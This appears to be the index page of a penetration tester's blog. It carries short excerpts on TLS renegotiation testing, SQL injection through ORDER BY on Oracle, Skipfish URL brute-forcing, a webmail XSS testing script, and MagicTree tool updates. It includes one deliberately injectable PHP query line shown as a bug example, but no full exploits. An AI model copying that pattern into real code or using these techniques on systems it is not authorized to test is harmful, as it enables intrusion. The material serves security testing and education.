alla's blog

Web Site is Alive Again

Our web server has temporarily succumbed to bit rot. Now it is migrated to a sparkling new virtual machine, DNS updated and everything seems to be ticking along as it should. Sorry for any inconvenience this might have caused.

(Really) Testing for SSL/TLS Re-negotiation

SSL/TLS Re-negotiation vulnerability (CVE-2009-3555) allows a man-in-the-middle to insert plain text in the beginning of an encrypted stream. It used to be possible to check if the server supports re-negotiation using OpenSSL s_client (see here). However, recent versions of OpenSSL disable insecure re-negotiation completely, so if you run s_client against a vulnerable target and request re-negotiation, it exits, same as if the target does not support re-negotiation:

Exploiting SQL Injection in ORDER BY on Oracle

Consider the following piece of code:


$sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name";

The WHERE clause is parametrized, but the ORDER BY isn't. This happens often enough. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection.

Why Investing in IT Security is Bad for Your Business: A Model

Consider a simple economic model. There are N companies that make doodahs. I am going to make two assumptions about the doodah market.

1. The market for doodahs is very competitive, so the profit margins are thin - a doodah maker that has a higher cost of production quickly goes out of business. This is not a very strong assumption - most modern markets are like this.

MagicTree FAQ and Build 1487

We have started a FAQ page for MagicTree. If you have a questions that should be added, please comment.

We have also posted MagicTree build 1487 for download. It contains various bug fixes, in particular in XML parsing, and minor UI improvements.

Tags: 

MagicTree vs. Dradis

Note: this post is unfinished - two videos are missing
Correction: Dradis can do reports in Word format

Several people have noted that MagicTree is similar to Dradis. In this post I will try to make a point by point comparison, outlining out both similarities and differences. Obviously, I have a bias - being MagicTree developer, I know MagicTree a lot better than Dradis. Feel free to correct me or point out the features that I have missed.

Tags: 

Video: Using MagicTree for Analysing Data

This video was going to be the first in a series of three. However I got stuck with the second one, so instead of waiting for the inspiration to hit me, I thought I'll publish this one anyway. Enjoy.

Using Skipfish for Numerical URL Brute-forcing

Suppose we have a web site that stores data files in a web accessible directory /data/ which is not indexable. And suppose the files are named /data/something_<timestamp>.txt. And we want to find as many data files present in this directory as possible. Further let's assume that the timestamp is in "yymmddhhmmss" format.

MagicTree Nessus version 2 XML parsing bug fix

Sébastien Damaye of aldeid.com has reported a bug in MagicTree data import from Nessus XML version 2. Build 1381 includes a corrected XSLT for Nessus XML version 2 and fixes this problem. Thanks to Sébastien for reporting it. The downloads page is updated to point to build 1381.

Webmail XSS Tester - Excess2

Here is a script to automate testing of webmail systems for cross-site scripting. It uses XSS Cheat Sheet to generate the injection strings. Compared to the previous version this version downloads XSS cheat sheet on the fly (instead of having it hard-coded) and supports SMTP authentication.

NAME
       excess2 - A script for testing webmail systems for cross-site scripting
       problems

DESCRIPTION

Pages

Subscribe to RSS - alla's blog